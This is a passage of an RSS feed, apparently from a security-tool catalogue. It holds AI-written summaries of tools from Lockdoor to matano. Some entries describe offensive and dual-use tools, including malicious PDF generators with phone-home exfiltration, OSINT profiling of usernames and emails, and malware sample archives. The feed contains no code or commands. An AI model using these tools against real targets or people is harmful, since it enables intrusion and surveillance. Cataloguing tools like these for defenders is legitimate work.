&lt;li&gt;&lt;a href="#crypto-%EF%B8%8F"&gt;&lt;strong&gt;Crypto&lt;/strong&gt; 🛡️:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#exploitation-"&gt;&lt;strong&gt;Exploitation&lt;/strong&gt; ❗:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#networking--"&gt;&lt;strong&gt;Networking&lt;/strong&gt; 🖧 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#password-attacks-%EF%B8%8F-1"&gt;&lt;strong&gt;Password Attacks&lt;/strong&gt; ✳️:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#post-exploitation-"&gt;&lt;strong&gt;Post Exploitation&lt;/strong&gt; ❗❗:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#privilege-escalation-%EF%B8%8F"&gt;&lt;strong&gt;Privilege Escalation&lt;/strong&gt; ⚠️:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#pentesting--security-assessment-findings-report-templates--"&gt;&lt;strong&gt;Pentesting &amp;amp; Security Assessment Findings Report Templates&lt;/strong&gt; 📝 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#reverse-engineering--"&gt;&lt;strong&gt;Reverse Engineering&lt;/strong&gt; ⚡ :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#social-engineering-"&gt;&lt;strong&gt;Social Engineering&lt;/strong&gt; 🎭:&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#walk-throughs--"&gt;&lt;strong&gt;Walk Throughs&lt;/strong&gt; 🚶 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#web-hacking--"&gt;&lt;strong&gt;Web Hacking&lt;/strong&gt; 🌐 :&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#other--"&gt;&lt;strong&gt;Other&lt;/strong&gt; 📚 :&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#contributing-"&gt;&lt;strong&gt;Contributing&lt;/strong&gt; :&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="changelog---"&gt;Changelog 📌 :&lt;/h1&gt;
&lt;h4 id="version-v23-is-out-"&gt;Version v2.3 IS OUT !!&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt; - Fixing some CI 

 - making a more stable version 

 - new docker iaage build

 - adding packages for each supported distros
&lt;/code&gt;&lt;/pre&gt;
&lt;h1 id="badges--"&gt;Badges 📌 :&lt;/h1&gt;
&lt;p&gt;&lt;img src="http://ForTheBadge.com/images/badges/made-with-python.svg" alt="made-with-python"&gt;
&lt;img src="https://badgen.net/github/release/SofianeHamlaoui/Lockdoor-Framework" alt="GitHub"&gt;
&lt;img src="https://badgen.net/pypi/license/lockdoor" alt="License"&gt;
&lt;img src="https://img.shields.io/badge/Tested%20on%20%20-Linux%20%26%20Windows-blue" alt="TestedON"&gt;&lt;/p&gt;</description></item><item><title>lonkero</title><link>https://rainmana.github.io/hackyfeed/tools/bountyyfi-lonkero/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bountyyfi-lonkero/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Lonkero is a professional-grade web security scanner engineered for advanced penetration testing, boasting over 125 sophisticated scanning modules written in Rust. Its notable features include an intelligent mode for context-aware scanning, machine learning capabilities to minimize false positives to 5%, and unique proof-based XSS detection that eliminates reliance on browsers, significantly increasing scan speed and accuracy. By leveraging a robust architecture that focuses on real vulnerabilities, Lonkero delivers efficient and precise security assessments for modern web technologies.&lt;/p&gt;</description></item><item><title>lumen</title><link>https://rainmana.github.io/hackyfeed/tools/naim94a-lumen/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/naim94a-lumen/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Lumen is a private server designed to integrate with IDA Pro 7.2 and later versions, enabling users to efficiently manage and retrieve function signatures via its database-backed infrastructure utilizing PostgreSQL. It features an experimental HTTP API for querying by function hash or file, facilitating collaborative reverse engineering workflows. The tool is provisioned with a straightforward setup through Docker and can be used with custom TLS configurations for secure communications.&lt;/p&gt;</description></item><item><title>lunasec</title><link>https://rainmana.github.io/hackyfeed/tools/lunasec-io-lunasec/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lunasec-io-lunasec/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; LunaTrace is an open-source supply chain security and auditing tool that monitors software dependencies for vulnerabilities, integrating seamlessly with GitHub to notify users of new CVEs before deployment. It offers both a free SaaS option and self-hosted deployment capabilities, making it a versatile alternative to commercial tools like GitHub Dependabot and Snyk. Notable features include automatic monitoring, GitHub Pull Request integration, and active development support.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;!--
 ~ Copyright by LunaSec (owned by Refinery Labs, Inc)
 ~
 ~ Licensed under the Creative Commons Attribution-ShareAlike 4.0 International
 ~ (the "License"); you may not use this file except in compliance with the
 ~ License. You may obtain a copy of the License at
 ~
 ~ https://creativecommons.org/licenses/by-sa/4.0/legalcode
 ~
 ~ See the License for the specific language governing permissions and
 ~ limitations under the License.
 ~
--&gt;
&lt;p align="center"&gt;
 &lt;img src='docs/static/img/logo-black-text.svg' width='60%'&gt;
&lt;/p&gt;</description></item><item><title>LunaTranslator</title><link>https://rainmana.github.io/hackyfeed/tools/hillya51-lunatranslator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hillya51-lunatranslator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; 视觉小说翻译器 / Visual Novel Translator&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;视觉小说翻译器 / Visual Novel Translator&lt;/p&gt;</description></item><item><title>lynis</title><link>https://rainmana.github.io/hackyfeed/tools/cisofy-lynis/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cisofy-lynis/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Lynis is a security auditing and hardening tool designed for UNIX-based systems, including Linux, macOS, and BSD. It conducts comprehensive security scans to evaluate system defenses, identify vulnerabilities, and suggest improvements for hardening systems against potential threats. Notable features include automated compliance testing, vulnerability detection, configuration management assistance, and adaptability for use by system administrators, auditors, and penetration testers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://linuxsecurity.expert/tools/lynis/"&gt;&lt;img src="https://badges.linuxsecurity.expert/tools/ranking/lynis.svg" alt="Linux Security Expert badge"&gt;&lt;/a&gt;
&lt;a href="https://travis-ci.org/CISOfy/lynis"&gt;&lt;img src="https://travis-ci.org/CISOfy/lynis.svg?branch=master" alt="Build Status"&gt;&lt;/a&gt;
&lt;a href="https://bestpractices.coreinfrastructure.org/projects/96"&gt;&lt;img src="https://bestpractices.coreinfrastructure.org/projects/96/badge" alt="CII Best Practices"&gt;&lt;/a&gt;
&lt;a href="https://cisofy.com/documentation/lynis/"&gt;Documentation&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Do you like this software? &lt;strong&gt;Star the project&lt;/strong&gt; and become a &lt;a href="https://github.com/CISOfy/lynis/stargazers"&gt;stargazer&lt;/a&gt;.&lt;/p&gt;</description></item><item><title>maigret</title><link>https://rainmana.github.io/hackyfeed/tools/soxoj-maigret/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/soxoj-maigret/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Maigret is a user-centric OSINT tool designed to gather comprehensive profiles based on usernames by scanning over 3000 websites, including Tor and I2P networks. Key features include profile data extraction, recursive search capabilities, and automated handling of censorship and captcha challenges, all without requiring API keys. This tool serves as an effective resource for analysts in social media investigations and identity verification.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="maigret"&gt;Maigret&lt;/h1&gt;
&lt;p align="center"&gt;
 &lt;p align="center"&gt;
 &lt;a href="https://pypi.org/project/maigret/"&gt;
 &lt;img alt="PyPI version badge for Maigret" src="https://img.shields.io/pypi/v/maigret?style=flat-square" /&gt;
 &lt;/a&gt;
 &lt;a href="https://pypi.org/project/maigret/"&gt; 
 &lt;img alt="PyPI download count for Maigret" src="https://img.shields.io/pypi/dw/maigret?style=flat-square" /&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/soxoj/maigret"&gt;
 &lt;img alt="Minimum Python version required: 3.10+" src="https://img.shields.io/badge/Python-3.10%2B-brightgreen?style=flat-square" /&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/soxoj/maigret/blob/main/LICENSE"&gt;
 &lt;img alt="License badge for Maigret" src="https://img.shields.io/github/license/soxoj/maigret?style=flat-square" /&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/soxoj/maigret"&gt;
 &lt;img alt="View count for Maigret project" src="https://komarev.com/ghpvc/?username=maigret&amp;color=brightgreen&amp;label=views&amp;style=flat-square" /&gt;
 &lt;/a&gt;
 &lt;/p&gt;</description></item><item><title>mailcat</title><link>https://rainmana.github.io/hackyfeed/tools/sharsil-mailcat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sharsil-mailcat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Mailcat is a tool designed to discover existing email addresses based on a user&amp;rsquo;s nickname, supporting over 170 domains across 37 email providers. It offers functionality through scripts that can be run via Tor or proxy to maintain anonymity, and it employs various methods such as SMTP and API for address retrieval. Notable features include extensive provider support and options for managing connection limits to enhance performance.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="mailcat"&gt;mailcat&lt;/h1&gt;
&lt;p align="center"&gt;
	&lt;img src="https://github.com/sharsil/mailcat/blob/main/logo.png?raw=true" height="200"/&gt;
&lt;/p&gt;</description></item><item><title>makin</title><link>https://rainmana.github.io/hackyfeed/tools/secrary-makin/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/secrary-makin/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; &lt;code&gt;makin&lt;/code&gt; is a malware assessment tool designed to simplify the process of identifying anti-debugging techniques employed by malicious samples. It injects a DLL into the target process to monitor specific API calls, providing insights into debugger detection methods, and can generate IDA Pro scripts for setting breakpoints at the identified APIs. Notable features include the ability to hook various functions from &lt;code&gt;ntdll.dll&lt;/code&gt; and &lt;code&gt;kernelbase.dll&lt;/code&gt;, effectively revealing complex anti-debugging strategies.&lt;/p&gt;</description></item><item><title>mal_unpack</title><link>https://rainmana.github.io/hackyfeed/tools/hasherezade-mal_unpack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hasherezade-mal_unpack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; mal_unpack is a dynamic malware unpacker that leverages PE-sieve to deploy packed malware, allowing it to unpack and dump the payload while terminating the original process. Its primary use case is for malware analysis in controlled environments, with notable features including options for dumping implanted PEs, shellcodes, and modified artifacts, as well as performance enhancements through an auxiliary driver.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="mal_unpack"&gt;mal_unpack&lt;/h1&gt;
&lt;p&gt;&lt;img src="./logo/logo.png" alt=""&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://ci.appveyor.com/project/hasherezade/mal-unpack"&gt;&lt;img src="https://ci.appveyor.com/api/projects/status/3cqqlah6unfhasik?svg=true" alt="Build status"&gt;&lt;/a&gt;
&lt;a href="https://app.codacy.com/gh/hasherezade/mal_unpack/dashboard?branch=master"&gt;&lt;img src="https://app.codacy.com/project/badge/Grade/fedbe124aa694761907bbe51bfc8d6f9" alt="Codacy Badge"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/mal_unpack/commits"&gt;&lt;img src="https://img.shields.io/github/commit-activity/m/hasherezade/mal_unpack" alt="Commit activity"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/mal_unpack/commits"&gt;&lt;img src="https://img.shields.io/github/last-commit/hasherezade/mal_unpack/master" alt="Last Commit"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/hasherezade/mal_unpack/releases"&gt;&lt;img src="https://img.shields.io/github/release/hasherezade/mal_unpack.svg" alt="GitHub release"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/mal_unpack/releases"&gt;&lt;img src="https://img.shields.io/github/release-date/hasherezade/mal_unpack?color=blue" alt="GitHub release date"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/mal_unpack/releases"&gt;&lt;img src="https://img.shields.io/github/downloads/hasherezade/mal_unpack/total.svg" alt="Github All Releases"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/mal_unpack/releases"&gt;&lt;img src="https://img.shields.io/github/downloads/hasherezade/mal_unpack/latest/total.svg" alt="Github Latest Release"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>malboxes</title><link>https://rainmana.github.io/hackyfeed/tools/gosecure-malboxes/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gosecure-malboxes/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Builds malware analysis Windows VMs so that you don&amp;rsquo;t have to.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Builds malware analysis Windows VMs so that you don&amp;rsquo;t have to.&lt;/p&gt;</description></item><item><title>malcom</title><link>https://rainmana.github.io/hackyfeed/tools/tomchop-malcom/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tomchop-malcom/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Malcom is a malware communication analyzer that visualizes network traffic to identify interactions with known malware sources, thereby aiding in malware analysis and intelligence gathering. Its primary use case is to detect command and control servers, monitor peer-to-peer networks, and unravel DNS fast-flux infrastructures. Notable features include its ability to convert complex network traffic data into actionable intelligence and a user-friendly graphical interface for rapid analysis.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="malcom---malware-communication-analyzer"&gt;Malcom - Malware Communication Analyzer&lt;/h1&gt;
&lt;p&gt;Malcom is a tool designed to analyze a system&amp;rsquo;s network communication using graphical representations of network traffic, and cross-reference them with known malware sources. This comes handy when analyzing how certain malware species try to communicate with the outside world.&lt;/p&gt;</description></item><item><title>malicious-pdf</title><link>https://rainmana.github.io/hackyfeed/tools/jonaslejon-malicious-pdf/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jonaslejon-malicious-pdf/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Malicious PDF is a tool designed to generate various malicious PDF files featuring phone-home capabilities for use in penetration testing and red-teaming. It supports integration with platforms like Burp Collaborator and Interact.sh, providing a diverse set of attack vectors through ten different crafted PDF examples meant for testing web applications, security products, and PDF readers. Key features include the ability to create PDFs exploiting vulnerabilities like external file access, JavaScript injection, and form data exfiltration.&lt;/p&gt;</description></item><item><title>malware_training_vol1</title><link>https://rainmana.github.io/hackyfeed/tools/hasherezade-malware_training_vol1/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hasherezade-malware_training_vol1/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;malware_training_vol1&amp;rdquo; repository provides a comprehensive training resource designed for individuals looking to deepen their understanding of Windows malware analysis. It offers a blend of theoretical knowledge and practical exercises covering a range of topics including PE structure, process management, and various malware tactics, while leveraging specific tools for effective analysis. Key features include structured modules, hands-on exercises, and a focus on core concepts essential for aspiring malware analysts.&lt;/p&gt;</description></item><item><title>Malware-Exhibit</title><link>https://rainmana.github.io/hackyfeed/tools/alvin-tosh-malware-exhibit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/alvin-tosh-malware-exhibit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Malware-Exhibit is a malware analysis tool designed for researchers and security professionals to dissect and analyze various malware samples. It supports multiple programming languages and platforms, allowing users to examine the behavior and characteristics of malware, providing insights for threat detection and mitigation. Notable features include a comprehensive user interface and the ability to integrate additional analysis tools and scripts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="./LICENSE"&gt;&lt;img src="https://img.shields.io/github/license/Ileriayo/markdown-badges?style=for-the-badge" alt="Licence"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1 id="-malware-exhibit-"&gt;&lt;h1 align="center"&gt;⚠️⚠️ Malware-Exhibit ⚠️⚠️&lt;/h1&gt;&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://img.shields.io/badge/c-%2300599C.svg?style=for-the-badge&amp;amp;logo=c&amp;amp;logoColor=white" alt="C"&gt;&lt;img src="https://img.shields.io/badge/c++-%2300599C.svg?style=for-the-badge&amp;amp;logo=c%2B%2B&amp;amp;logoColor=white" alt="C++"&gt;&lt;img src="https://img.shields.io/badge/go-%2300ADD8.svg?style=for-the-badge&amp;amp;logo=go&amp;amp;logoColor=white" alt="Go"&gt;&lt;img src="https://img.shields.io/badge/java-%23ED8B00.svg?style=for-the-badge&amp;amp;logo=java&amp;amp;logoColor=white" alt="Java"&gt;&lt;img src="https://img.shields.io/badge/javascript-%23323330.svg?style=for-the-badge&amp;amp;logo=javascript&amp;amp;logoColor=%23F7DF1E" alt="JavaScript"&gt;&lt;img src="https://img.shields.io/badge/perl-%2339457E.svg?style=for-the-badge&amp;amp;logo=perl&amp;amp;logoColor=white" alt="Perl"&gt;&lt;img src="https://img.shields.io/badge/ruby-%23CC342D.svg?style=for-the-badge&amp;amp;logo=ruby&amp;amp;logoColor=white" alt="Ruby"&gt;&lt;img src="https://img.shields.io/badge/php-%23777BB4.svg?style=for-the-badge&amp;amp;logo=php&amp;amp;logoColor=white" alt="PHP"&gt; &lt;img src="https://img.shields.io/badge/PowerShell-%235391FE.svg?style=for-the-badge&amp;amp;logo=powershell&amp;amp;logoColor=white" alt="PowerShell"&gt;&lt;img src="https://img.shields.io/badge/python-3670A0?style=for-the-badge&amp;amp;logo=python&amp;amp;logoColor=ffdd54" alt="Python"&gt;&lt;img src="https://img.shields.io/badge/r-%23276DC3.svg?style=for-the-badge&amp;amp;logo=r&amp;amp;logoColor=white" alt="R"&gt;&lt;img src="https://img.shields.io/badge/.NET-5C2D91?style=for-the-badge&amp;amp;logo=.net&amp;amp;logoColor=white" alt=".Net"&gt;&lt;img src="https://img.shields.io/badge/shell_script-%23121011.svg?style=for-the-badge&amp;amp;logo=gnu-bash&amp;amp;logoColor=white" alt="Shell Script"&gt;&lt;img src="https://img.shields.io/badge/typescript-%23007ACC.svg?style=for-the-badge&amp;amp;logo=typescript&amp;amp;logoColor=white" alt="TypeScript"&gt;&lt;img src="https://img.shields.io/badge/rust-%23000000.svg?style=for-the-badge&amp;amp;logo=rust&amp;amp;logoColor=white" alt="Rust"&gt;&lt;img src="https://img.shields.io/badge/Firefox-FF7139?style=for-the-badge&amp;amp;logo=Firefox-Browser&amp;amp;logoColor=white" alt="Firefox"&gt;&lt;img src="https://img.shields.io/badge/Edge-0078D7?style=for-the-badge&amp;amp;logo=Microsoft-edge&amp;amp;logoColor=white" alt="Edge"&gt;&lt;img src="https://img.shields.io/badge/Firebase-039BE5?style=for-the-badge&amp;amp;logo=Firebase&amp;amp;logoColor=white" alt="Firebase"&gt;&lt;img src="https://img.shields.io/badge/postgres-%23316192.svg?style=for-the-badge&amp;amp;logo=postgresql&amp;amp;logoColor=white" alt="Postgres"&gt;&lt;img src="https://img.shields.io/badge/PayPal-00457C?style=for-the-badge&amp;amp;logo=paypal&amp;amp;logoColor=white" alt="PayPal"&gt;&lt;img src="https://img.shields.io/badge/AWS-%23FF9900.svg?style=for-the-badge&amp;amp;logo=amazon-aws&amp;amp;logoColor=white" alt="AWS"&gt;&lt;img src="https://img.shields.io/badge/azure-%230072C6.svg?style=for-the-badge&amp;amp;logo=microsoftazure&amp;amp;logoColor=white" alt="Azure"&gt;&lt;img src="https://img.shields.io/badge/Oracle-F80000?style=for-the-badge&amp;amp;logo=oracle&amp;amp;logoColor=white" alt="Oracle"&gt;&lt;img src="https://img.shields.io/badge/Microsoft-0078D4?style=for-the-badge&amp;amp;logo=microsoft&amp;amp;logoColor=white" alt="Microsoft"&gt; &lt;img src="https://img.shields.io/badge/Android-3DDC84?style=for-the-badge&amp;amp;logo=android&amp;amp;logoColor=white" alt="Android"&gt; &lt;img src="https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&amp;amp;logo=linux&amp;amp;logoColor=black" alt="Linux"&gt; &lt;img src="https://img.shields.io/badge/Ubuntu-E95420?style=for-the-badge&amp;amp;logo=ubuntu&amp;amp;logoColor=white" alt="Ubuntu"&gt; &lt;img src="https://img.shields.io/badge/mac%20os-000000?style=for-the-badge&amp;amp;logo=macos&amp;amp;logoColor=F0F0F0" alt="macOS"&gt; &lt;img src="https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&amp;amp;logo=windows&amp;amp;logoColor=white" alt="Windows"&gt; &lt;img src="https://img.shields.io/badge/apache-%23D42029.svg?style=for-the-badge&amp;amp;logo=apache&amp;amp;logoColor=white" alt="Apache"&gt; &lt;img src="https://img.shields.io/badge/apache%20tomcat-%23F8DC75.svg?style=for-the-badge&amp;amp;logo=apache-tomcat&amp;amp;logoColor=black" alt="Apache Tomcat"&gt; &lt;img src="https://img.shields.io/badge/Apple-%23000000.svg?style=for-the-badge&amp;amp;logo=apple&amp;amp;logoColor=white" alt="Apple"&gt; &lt;img src="https://img.shields.io/badge/nginx-%23009639.svg?style=for-the-badge&amp;amp;logo=nginx&amp;amp;logoColor=white" alt="Nginx"&gt; &lt;img src="https://img.shields.io/badge/Google_Play-414141?style=for-the-badge&amp;amp;logo=google-play&amp;amp;logoColor=white" alt="Play Store"&gt; &lt;img src="https://img.shields.io/badge/F_Droid-1976D2?style=for-the-badge&amp;amp;logo=f-droid&amp;amp;logoColor=white" alt="F Droid"&gt; &lt;img src="https://img.shields.io/badge/App_Store-0D96F6?style=for-the-badge&amp;amp;logo=app-store&amp;amp;logoColor=white" alt="App Store"&gt; &lt;img src="https://img.shields.io/badge/github-%23121011.svg?style=for-the-badge&amp;amp;logo=github&amp;amp;logoColor=white" alt="GitHub"&gt; &lt;img src="https://img.shields.io/badge/xbox-%23107C10.svg?style=for-the-badge&amp;amp;logo=xbox&amp;amp;logoColor=white" alt="Xbox"&gt;&lt;/p&gt;</description></item><item><title>malware-samples</title><link>https://rainmana.github.io/hackyfeed/tools/fabrimagic72-malware-samples/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/fabrimagic72-malware-samples/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The malware-samples repository is a curated collection of malware samples gathered from various honeypots managed globally, intended for research and analysis purposes. Users are encouraged to download, analyze, and reverse-engineer the samples while adhering to safety precautions, as the repository includes actual malware that may not be flagged by antivirus tools. Notably, all archived samples are password protected, with access secured by the password &amp;ldquo;infected.&amp;rdquo;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="malware-samples"&gt;malware-samples&lt;/h1&gt;
&lt;p&gt;A collection of malware samples caught by several honeypots i handle worldwide&lt;/p&gt;</description></item><item><title>malware-samples</title><link>https://rainmana.github.io/hackyfeed/tools/inquest-malware-samples/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/inquest-malware-samples/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The InQuest malware-samples repository serves as a curated collection of malware samples along with associated dissection details, primarily aimed at researchers and analysts in cybersecurity. Its notable features include a variety of sample types such as documents, executables, and macros, as well as links to in-depth analyses and reports, enhancing the understanding of malware behavior and leveraging for education and testing purposes. The tool is particularly useful for studying real-world exploit scenarios and dissecting malware payloads for security assessments.&lt;/p&gt;</description></item><item><title>malwoverview</title><link>https://rainmana.github.io/hackyfeed/tools/alexandreborges-malwoverview/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/alexandreborges-malwoverview/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Malwoverview is a versatile malware analysis tool designed for cybersecurity professionals to visualize and understand malware architecture without submitting samples to external endpoints, thereby ensuring compliance with Non-Disclosure Agreements. Its primary use case involves generating detailed reports on malware characteristics, and it offers a variety of analysis features, including dynamic and static analysis capabilities, and an intuitive user interface for enhanced usability. The tool is free and open-source, allowing users to modify and redistribute it under the GNU General Public License.&lt;/p&gt;</description></item><item><title>mantis</title><link>https://rainmana.github.io/hackyfeed/tools/phonepe-mantis/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/phonepe-mantis/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Mantis is a command-line framework that automates the processes of asset discovery, reconnaissance, and scanning for vulnerabilities. It efficiently identifies subdomains, certificates, and active assets, culminating in comprehensive scans for misconfigurations and secrets using a combination of open-source and custom tools. Notable features include distributed scanning capabilities, customizable scans, a dashboard for vulnerability management, and integration with various DNS services.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;img src="./images/mantis.png" align="middle"&gt;
&lt;p align="center"&gt;
 &lt;a href="#features-rocket"&gt;Features&lt;/a&gt; •
 &lt;a href="#modules-"&gt;Modules&lt;/a&gt; •
 &lt;a href="#installation-%EF%B8%8F"&gt;Installation&lt;/a&gt; •
 &lt;a href="#command-line-options-%EF%B8%8F"&gt;Command Line Options&lt;/a&gt; •
 &lt;a href="https://phonepe.github.io/mantis/"&gt;Documentation&lt;/a&gt; •
 &lt;a href="#contributors"&gt;Contributors&lt;/a&gt; •
 &lt;a href="https://discord.gg/uJV8Y3uSGu"&gt;Join Discord&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Massive-Web-Application-Penetration-Testing-Bug-Bounty-Notes</title><link>https://rainmana.github.io/hackyfeed/tools/xalgord-massive-web-application-penetration-testing-bug-bounty-notes/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/xalgord-massive-web-application-penetration-testing-bug-bounty-notes/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Massive Web Application Penetration Testing Bug Bounty Notes repository provides a comprehensive guide tailored for both novice and advanced penetration testers, emphasizing methodologies for web application security assessments. It covers essential topics such as setting up testing environments, identifying and exploiting the OWASP Top 10 vulnerabilities, and practical resources like video tutorials for enhanced learning. Notable features include a structured approach to various testing phases, from foundational concepts to specific attack vectors related to session management, authentication, and business logic vulnerabilities.&lt;/p&gt;</description></item><item><title>matano</title><link>https://rainmana.github.io/hackyfeed/tools/matanolabs-matano/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/matanolabs-matano/</guid><description>&lt;blockquote&gt;
